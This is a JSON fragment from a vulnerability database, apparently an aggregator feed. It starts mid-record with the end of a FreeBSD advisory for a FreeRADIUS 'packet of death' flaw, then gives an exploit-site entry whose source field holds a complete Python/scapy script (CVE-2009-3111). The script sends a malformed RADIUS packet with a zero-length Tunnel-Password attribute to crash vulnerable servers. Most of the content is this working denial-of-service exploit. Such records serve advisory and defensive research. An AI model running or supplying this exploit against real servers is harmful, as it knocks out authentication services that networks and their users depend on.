vulnerability.\nThis issue is similar to the previous Tunnel-Password\n\t issue noted below. The vulnerable versions are 1.1.3\n\t through 1.1.7. Version 2.x is not affected.\n\n", "edition": 4, "modified": "2009-12-14T00:00:00", "published": "2009-09-09T00:00:00", "id": "1B3F854B-E4BD-11DE-B276-000D8787E1BE", "href": "https://vuxml.freebsd.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html", "title": "freeradius -- remote packet of death vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-02-16T05:08:01", "edition": 2, "description": "Exploit for multiple platform in category dos / poc", "published": "2009-09-11T00:00:00", "type": "zdt", "title": "FreeRadius < 1.1.8 Remote Packet of Death Exploit (CVE-2009-3111)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-09-11T00:00:00", "id": "1337DAY-ID-7004", "href": "https://0day.today/exploit/description/7004", "sourceData": "=================================================================\r\nFreeRadius < 1.1.8 Remote Packet of Death Exploit (CVE-2009-3111)\r\n=================================================================\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint \"Usage: radius_killer.py <radiushost>\\n\"\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\\r\n\tRadiusAttr(type=69,value=\"\",len=2)\r\n\r\nsend(PoD)\r\n\r\n\r\n\n# 0day.today [2018-02-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7004"}]}